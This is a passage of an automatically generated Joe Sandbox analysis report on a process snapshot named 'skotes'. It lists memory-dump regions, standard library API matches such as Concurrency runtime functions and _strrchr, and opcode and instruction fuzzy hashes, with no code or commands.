                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: List$AcquireConcurrency::details::_Concurrency::scheduler_resource_allocation_error::scheduler_resource_allocation_errorLock::_ReaderSafeWriteWriterstd::invalid_argument::invalid_argument
                                                                                                                • String ID: eventObject
                                                                                                                • API String ID: 1288476792-1680012138
                                                                                                                • Opcode ID: 6390ec6ffdd749e647e946e2bd3096ca16c903e80f8e1961d1b0c2bf6686204c
                                                                                                                • Instruction ID: a9158e912a29f253adaa663b15977e021b17bf2ecd1919abbc8f4b15a95c2a2b
                                                                                                                • Opcode Fuzzy Hash: 6390ec6ffdd749e647e946e2bd3096ca16c903e80f8e1961d1b0c2bf6686204c
                                                                                                                • Instruction Fuzzy Hash: 7611E575644204FBDB28FBA4CC4AFEE73786F41710F204215B505A61C1DB78AA04C675
                                                                                                                APIs
                                                                                                                • Concurrency::details::SchedulerProxy::GetCurrentThreadExecutionResource.LIBCMT ref: 007AA102
                                                                                                                • Concurrency::details::ResourceManager::RemoveExecutionResource.LIBCONCRT ref: 007AA126
                                                                                                                • std::invalid_argument::invalid_argument.LIBCONCRT ref: 007AA139
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: Resource$Concurrency::details::Execution$CurrentManager::Proxy::RemoveSchedulerThreadstd::invalid_argument::invalid_argument
                                                                                                                • String ID: pScheduler
                                                                                                                • API String ID: 246774199-923244539
                                                                                                                • Opcode ID: 7cc5d586e4b753b76cc217082dcb01d58fc30b685d01af23648ca248c227f056
                                                                                                                • Instruction ID: 763eb757e4ff996d981289b1099fef77f8703c2477ed1359ed880407d840ec9f
                                                                                                                • Opcode Fuzzy Hash: 7cc5d586e4b753b76cc217082dcb01d58fc30b685d01af23648ca248c227f056
                                                                                                                • Instruction Fuzzy Hash: 03F0E975900208F7C725FA54EC86C9EB3799EC2714B208329E40657181DB7CAE45CBD2
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: _strrchr
                                                                                                                • String ID:
                                                                                                                • API String ID: 3213747228-0
                                                                                                                • Opcode ID: c90ae3db66b5619743134332522a0b96de832b73a835be1452314c5289bd2e52
                                                                                                                • Instruction ID: 77ac5c4256ab6070df1f60937f3493894eb0182b6ea6c90476419967f83aec47
                                                                                                                • Opcode Fuzzy Hash: c90ae3db66b5619743134332522a0b96de832b73a835be1452314c5289bd2e52
                                                                                                                • Instruction Fuzzy Hash: D7B10532A04686DFDB16CF28C885BEEBFE5EF55350F14816AE855EB242D6389D01CB60
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: AdjustPointer
                                                                                                                • String ID:
                                                                                                                • API String ID: 1740715915-0
                                                                                                                • Opcode ID: 8d9f4253df27dcc7e3754f71cfa8fec7f9096557ca208b49321eb3340ed59487
                                                                                                                • Instruction ID: 76a370d4a2c1aaf52d24ee0cd9239e49920ab3341e8981a813bd40dc3d4b28d2
                                                                                                                • Opcode Fuzzy Hash: 8d9f4253df27dcc7e3754f71cfa8fec7f9096557ca208b49321eb3340ed59487
                                                                                                                • Instruction Fuzzy Hash: 5B51E372601A0EEFDB299F18D845BFA73B5FF14310F248529E80197291E739ED41DB91
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3371008126.0000000000A8A000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3372074771.0000000000A97000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_9_2_780000_skotes.jbxd
                                                                                                                Yara matches
                                                                                                                Similarity
                                                                                                                • API ID: EqualOffsetTypeids
                                                                                                                • String ID:
                                                                                                                • API String ID: 1707706676-0
                                                                                                                • Opcode ID: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
                                                                                                                • Instruction ID: 001a3327260a06f388c80bb6d1f4e239849eec228e7e5a4ef41f65bf9a8a2084
                                                                                                                • Opcode Fuzzy Hash: 7eba31bc2cdc899ce0d39c1d43e6a64f477002fbbb014f00cff841445868ded1
                                                                                                                • Instruction Fuzzy Hash: EE518A35B042099FDF11CF68C4807EEBBF5EF15354F14449AE950A7352D73AAA05CBA0
                                                                                                                APIs
                                                                                                                • Concurrency::details::ContextBase::TraceContextEvent.LIBCMT ref: 007ADB64
                                                                                                                  • Part of subcall function 007A8F2F: Concurrency::details::ContextBase::ThrowContextEvent.LIBCONCRT ref: 007A8F50
                                                                                                                • Concurrency::details::InternalContextBase::FindWorkForBlockingOrNesting.LIBCONCRT ref: 007ADBC3
                                                                                                                • Concurrency::details::InternalContextBase::PrepareForUse.LIBCONCRT ref: 007ADBE9
                                                                                                                • Concurrency::location::_Assign.LIBCMT ref: 007ADC56
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000009.00000002.3366662935.0000000000781000.00000040.00000001.01000000.00000008.sdmp, Offset: 00780000, based on PE: true
                                                                                                                • Associated: 00000009.00000002.3366626281.0000000000780000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366662935.00000000007E2000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366745256.00000000007E9000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366768692.00000000007EB000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3366796206.00000000007F7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367107515.000000000095D000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367177492.000000000095F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000096F000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3367276568.000000000097C000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369064269.000000000098F000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369106262.0000000000991000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369182022.0000000000992000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369291233.0000000000996000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369323074.00000000009A7000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369346313.00000000009A8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369395324.00000000009AB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369433714.00000000009AC000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369563154.00000000009B6000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369679868.00000000009C1000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369776520.00000000009DC000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369872584.00000000009E3000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3369987756.00000000009E4000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370042279.00000000009E8000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370094443.00000000009EF000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370149282.00000000009F0000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370204937.00000000009FB000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370268119.00000000009FE000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370318976.0000000000A06000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370383288.0000000000A0E000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370447817.0000000000A15000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370495306.0000000000A17000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370579055.0000000000A34000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A35000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370645936.0000000000A54000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370822057.0000000000A82000.00000040.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370887849.0000000000A83000.00000080.00000001.01000000.00000008.sdmpDownload File
                                                                                                                • Associated: 00000009.00000002.3370946195.0000000000A88000.00000040.00000001.01000000.00000008.sdmpDownload File
